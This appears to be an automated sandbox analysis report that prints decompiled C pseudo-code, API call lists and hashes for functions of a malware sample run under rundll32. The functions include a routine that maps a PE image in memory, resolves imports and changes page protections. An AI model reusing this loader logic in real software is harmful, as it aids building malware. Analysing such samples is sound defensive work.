                                          • Opcode ID: 32fece1bc7419b2084c65f5cf733fbfd2a56264344e260a38a441f0731539616
                                          • Instruction ID: 7ff743eaa0cfcf418074890f0176b0bfb6e6842f1a7752a5a607179b1c20e672
                                          • Opcode Fuzzy Hash: 32fece1bc7419b2084c65f5cf733fbfd2a56264344e260a38a441f0731539616
                                          • Instruction Fuzzy Hash: 85317A32A00118FFEB10BB90DE84EEA7BBDEF44704F15457DB584BB190D675EA099B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04089F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E04089F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x408d2a4; // 0xbfa5a8
				_push(0x800);
				_push(0);
				_push( *0x408d238);
				_t1 = _t43 + 0x408e791; // 0x6976612e
				_t44 = _t1;
				if( *0x408d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x408d24c =  *0x408d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04087CF7(_a4, _t41); // executed
						_t19 = E040860CF(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x408d24c < 5) {
								 *0x408d24c =  *0x408d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E04086106();
						RtlFreeHeap( *0x408d238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E0408514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E04081754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}













                                          0x04089f11
                                          0x04089f11
                                          0x04089f14
                                          0x04089f15
                                          0x04089f1f
                                          0x04089f26
                                          0x04089f2b
                                          0x04089f2d
                                          0x04089f33
                                          0x04089f33
                                          0x04089f39
                                          0x04089f61
                                          0x04089f79
                                          0x04089f7b
                                          0x04089f7c
                                          0x04089f7e
                                          0x04089fbc
                                          0x04089fbc
                                          0x04089fc2
                                          0x04089fc8
                                          0x04089fc8
                                          0x04089f80
                                          0x04089f86
                                          0x04089f89
                                          0x04089f98
                                          0x04089f9a
                                          0x04089fa1
                                          0x04089fd5
                                          0x04089fda
                                          0x04089fdc
                                          0x04089fde
                                          0x04089fde
                                          0x00000000
                                          0x04089fdc
                                          0x04089fa3
                                          0x04089fa8
                                          0x04089fb6
                                          0x00000000
                                          0x04089fb6
                                          0x04089f70
                                          0x04089f75
                                          0x04089f75
                                          0x00000000
                                          0x04089f75
                                          0x04089f3b
                                          0x04089f43
                                          0x00000000
                                          0x00000000
                                          0x04089f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04089F3B
                                            • Part of subcall function 04081754: GetTickCount.KERNEL32 ref: 04081768
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 040817B8
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 040817D5
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 04081801
                                            • Part of subcall function 04081754: HeapFree.KERNEL32(00000000,?), ref: 04081813
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 04081834
                                            • Part of subcall function 04081754: HeapFree.KERNEL32(00000000,?), ref: 04081844
                                            • Part of subcall function 04081754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04081872
                                            • Part of subcall function 04081754: GetTickCount.KERNEL32 ref: 04081883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04089F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04089C62,00000002,?,?,?,?), ref: 04089FB6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: b8d28eb16aa39f4feab72cfee4e3e89ac4f1fd731450cc5b8851a994b838d264
                                          • Instruction ID: 9e124bae2c6a1cef2fa99bdb569fd25a8c87218419c1e33cc35ddb91bbc634a6
                                          • Opcode Fuzzy Hash: b8d28eb16aa39f4feab72cfee4e3e89ac4f1fd731450cc5b8851a994b838d264
                                          • Instruction Fuzzy Hash: 0B214CB1200214ABEB15BF54DA40AEA37ADEF54348F10412DF982B7242D778FD45ABA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511EB4, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00511EB4(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}















                                          0x00511ebe
                                          0x00511ec3
                                          0x00511ecf
                                          0x00511edc
                                          0x00511ee2
                                          0x00511ee4
                                          0x00511eea
                                          0x00511f57
                                          0x00511f5e
                                          0x00511f5e
                                          0x00511eec
                                          0x00511eef
                                          0x00511eef
                                          0x00511ef3
                                          0x00000000
                                          0x00000000
                                          0x00511ef5
                                          0x00511ef9
                                          0x00511f11
                                          0x00511f15
                                          0x00511f29
                                          0x00511f17
                                          0x00511f17
                                          0x00511f1d
                                          0x00511f21
                                          0x00511f21
                                          0x00511efb
                                          0x00511efb
                                          0x00511f07
                                          0x00511f0c
                                          0x00511f0c
                                          0x00511f3a
                                          0x00511f3e
                                          0x00511f46
                                          0x00511f46
                                          0x00511f49
                                          0x00511f4c
                                          0x00511f4f
                                          0x00511f55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00511f55
                                          0x00000000

                                          APIs
                                          • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00511EE2
                                          • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00511F3A
                                          • GetLastError.KERNEL32 ref: 00511F40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          • Opcode ID: 269984346cb4c95398f85ee7b22deb46f1b6352e8f69e1acb9c9c5eb73316921
                                          • Instruction ID: 3431d31bfaf6fe3b33efd5eea93029ec0c1781df58473db4626e279ad23d08d1
                                          • Opcode Fuzzy Hash: 269984346cb4c95398f85ee7b22deb46f1b6352e8f69e1acb9c9c5eb73316921
                                          • Instruction Fuzzy Hash: E521AE72900209EFEB208F94CC80EEDBBB4FF14314F204599E6409B142E3749AC9DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005116E4, Relevance: 4.6, APIs: 3, Instructions: 62stringthreadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E005116E4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x514144;
				if( *0x51412c > 5) {
					_t16 = _t15 + 0x5150f4;
				} else {
					_t16 = _t15 + 0x5150b1;
				}
				E00511000(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E00511D86( &_v32,  &_v16,  *0x514140 ^ 0xc786104c) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x514138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E005110FC(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x514138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E00511ADC(_v28); // executed
				}
				ExitThread(_t25);
			}

















                                          0x005116ea
                                          0x005116fb
                                          0x00511705
                                          0x005116fd
                                          0x005116fd
                                          0x005116fd
                                          0x0051170c
                                          0x00511715
                                          0x0051171a
                                          0x00511738
                                          0x00511793
                                          0x0051173a
                                          0x00511740
                                          0x00511746
                                          0x00511746
                                          0x00511754
                                          0x00511758
                                          0x0051175f
                                          0x00511761
                                          0x00511765
                                          0x00511767
                                          0x0051176e
                                          0x00511782
                                          0x00511770
                                          0x00511776
                                          0x0051177b
                                          0x0051176e
                                          0x0051178a
                                          0x0051178a
                                          0x00511795

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExitThreadlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3726537860-0
                                          • Opcode ID: 3ce641a766e71222294d2e1f4f7fd5f499a02f08f2433dbe710729f02f02b452
                                          • Instruction ID: 26e8fd74a2005c6dedd04515dc4c7928814f73ad490850746a87f23ba826c768
                                          • Opcode Fuzzy Hash: 3ce641a766e71222294d2e1f4f7fd5f499a02f08f2433dbe710729f02f02b452
                                          • Instruction Fuzzy Hash: 5C11EE71404A06ABE710DB70CC8CED77BECFB58350F0448A9F605D32A1EB20E588CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0408642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04084FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x408d2a4; // 0xbfa5a8
						_t20 = _t68 + 0x408e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04085103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x04086432
                                          0x04086435
                                          0x04086445
                                          0x0408644e
                                          0x04086452
                                          0x04086520
                                          0x04086526
                                          0x04086526
                                          0x0408646c
                                          0x04086471
                                          0x04086475
                                          0x0408647b
                                          0x04086480
                                          0x04086487
                                          0x04086496
                                          0x04086496
                                          0x0408649a
                                          0x0408649c
                                          0x040864a8
                                          0x040864b3
                                          0x040864be
                                          0x040864c2
                                          0x040864cc
                                          0x040864d0
                                          0x040864d2
                                          0x040864d7
                                          0x040864de
                                          0x040864ee
                                          0x040864ee
                                          0x040864d7
                                          0x040864d0
                                          0x040864f0
                                          0x040864f5
                                          0x040864fa
                                          0x040864fa
                                          0x040864fd
                                          0x04086506
                                          0x0408650b
                                          0x0408650b
                                          0x04086510
                                          0x04086515
                                          0x04086515
                                          0x04086510
                                          0x0408649a
                                          0x04086517
                                          0x0408651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04084FFA: SysAllocString.OLEAUT32(80000002), ref: 04085057
                                            • Part of subcall function 04084FFA: SysFreeString.OLEAUT32(00000000), ref: 040850BD
                                          • SysFreeString.OLEAUT32(?), ref: 0408650B
                                          • SysFreeString.OLEAUT32(0408A6F4), ref: 04086515
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 984d78407625fed571aceb5e3eaecc0265a73baf1fbb513c9195c2d152e5a02d
                                          • Instruction ID: 77e07ab747befb2589645d667d15267f5bb89d4bade21a587b5d1c88b7bf7271
                                          • Opcode Fuzzy Hash: 984d78407625fed571aceb5e3eaecc0265a73baf1fbb513c9195c2d152e5a02d
                                          • Instruction Fuzzy Hash: 84317A71500159AFCB21EF68C988C9FBBB9FFC9744B114A5CF845AB214E632ED41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040873E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E040873E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E040858BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0408147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x040873ee
                                          0x040873f9
                                          0x040873fb
                                          0x04087401
                                          0x04087403
                                          0x04087408
                                          0x04087411
                                          0x04087415
                                          0x0408741e
                                          0x04087422
                                          0x04087431
                                          0x04087424
                                          0x04087425
                                          0x0408742a
                                          0x0408742a
                                          0x04087422
                                          0x04087415
                                          0x0408743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,040851DC,7519F710,00000000,?,?,040851DC), ref: 04087401
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,040851DC,040851DD,?,?,040851DC), ref: 0408741E
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 01d7ddeec2a4fc71cc1d6163a59976ebcce5d3062313329299047f0236084ef7
                                          • Instruction ID: b515cd3fc168b15f959e0d673200e26486bfec14ca666119c9c12c296db32f54
                                          • Opcode Fuzzy Hash: 01d7ddeec2a4fc71cc1d6163a59976ebcce5d3062313329299047f0236084ef7
                                          • Instruction Fuzzy Hash: 97F05436600149BAE711EAB98E00EAF7AFDDBC5654F21006DA944F7244EB74EF0196B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04087BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E04087BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x408d2a4; // 0xbfa5a8
				_t4 = _t15 + 0x408e39c; // 0x4c88944
				_t20 = _t4;
				_t6 = _t15 + 0x408e124; // 0x650047
				_t17 = E0408642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04084CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x04087bb3
                                          0x04087bba
                                          0x04087bbb
                                          0x04087bbc
                                          0x04087bbd
                                          0x04087bc3
                                          0x04087bc8
                                          0x04087bc8
                                          0x04087bd2
                                          0x04087be4
                                          0x04087beb
                                          0x04087c19
                                          0x04087bed
                                          0x04087bef
                                          0x04087bf4
                                          0x04087c16
                                          0x04087bf6
                                          0x04087bf9
                                          0x04087c00
                                          0x04087c05
                                          0x04087c07
                                          0x04087c07
                                          0x04087c0c
                                          0x04087c0c
                                          0x04087bf4
                                          0x04087c20

                                          APIs
                                            • Part of subcall function 0408642C: SysFreeString.OLEAUT32(?), ref: 0408650B
                                            • Part of subcall function 04084CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0408358E,004F0053,00000000,?), ref: 04084CDC
                                            • Part of subcall function 04084CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0408358E,004F0053,00000000,?), ref: 04084D06
                                            • Part of subcall function 04084CD3: memset.NTDLL ref: 04084D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04087C0C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 12ed0e1f21e4b64ff321b44d30082e5f150a08720c84ee819b25488ddb5009a9
                                          • Instruction ID: 81898e86b66274bd082cf6c9bbe22f4a5bd471afaf969778bc1a5e78b47538e8
                                          • Opcode Fuzzy Hash: 12ed0e1f21e4b64ff321b44d30082e5f150a08720c84ee819b25488ddb5009a9
                                          • Instruction Fuzzy Hash: B5019E3151001AFFEB51AFA4CE00AEEBBB8EB14244F00453DE985F7165E371E9528BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511000, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00511000(void* __eax, intOrPtr _a4) {

				 *0x514150 =  *0x514150 & 0x00000000;
				_push(0);
				_push(0x51414c);
				_push(1);
				_push(_a4);
				 *0x514148 = 0xc; // executed
				L005111CE(); // executed
				return __eax;
			}



                                          0x00511000
                                          0x00511007
                                          0x00511009
                                          0x0051100e
                                          0x00511010
                                          0x00511014
                                          0x0051101e
                                          0x00511023

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00511711,00000001,0051414C,00000000), ref: 0051101E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: 03c82075380533b34b56c1ef6a6e308d4138f97e90f7a8d045139fa746b52fe9
                                          • Instruction ID: f9c917d444a2f45f368869f42c98996069d647f28a4d48c3c811242e0d9c53c1
                                          • Opcode Fuzzy Hash: 03c82075380533b34b56c1ef6a6e308d4138f97e90f7a8d045139fa746b52fe9
                                          • Instruction Fuzzy Hash: 94C04CB42C0341B6F6209F409C4AFC57E917771B05F155504B610251D1D3F614D8DD19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040858BE, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E040858BE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x408d238, 0, _a4); // executed
				return _t2;
			}




                                          0x040858ca
                                          0x040858d0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: a6bd1546c16a7d7a62dc6b15b5ab8bd47546fbc9bc8cbc5bbfd3f48273ba19f2
                                          • Instruction ID: c1b14737d1c96374dab2794b71d8a9d55e9ad782c880eeef97940be51fbfe02b
                                          • Opcode Fuzzy Hash: a6bd1546c16a7d7a62dc6b15b5ab8bd47546fbc9bc8cbc5bbfd3f48273ba19f2
                                          • Instruction Fuzzy Hash: FAB01231004100EBEA014F00DF08F05BB31EF60700F018138B280241B0833D4C20EF26
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511ADC, Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E00511ADC(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E00511F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E00511CE4( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t28 = E005115C2(_t33, _t37);
						if(_t28 == 0) {
							_t25 = E00511EB4(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E00511938(_t35);
					L8:
					return _t28;
				}
			}












                                          0x00511ae4
                                          0x00511b01
                                          0x00511b08
                                          0x00511b67
                                          0x00000000
                                          0x00511b0a
                                          0x00511b0a
                                          0x00511b14
                                          0x00511b18
                                          0x00511b1d
                                          0x00511b26
                                          0x00511b2a
                                          0x00511b2f
                                          0x00511b34
                                          0x00511b38
                                          0x00511b3d
                                          0x00511b3e
                                          0x00511b42
                                          0x00511b47
                                          0x00511b4f
                                          0x00511b4f
                                          0x00511b47
                                          0x00511b38
                                          0x00511b2a
                                          0x00511b51
                                          0x00511b5a
                                          0x00511b5e
                                          0x00511b68
                                          0x00511b6e
                                          0x00511b6e

                                          APIs
                                            • Part of subcall function 00511F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00511B06,?,?,?,?,00000002,?,0051178F), ref: 00511F86
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FA8
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FBE
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FD4
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FEA
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00512000
                                            • Part of subcall function 00511CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00511B14,?,?,?,?,?,?,00000002), ref: 00511D1B
                                            • Part of subcall function 00511CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00511D50
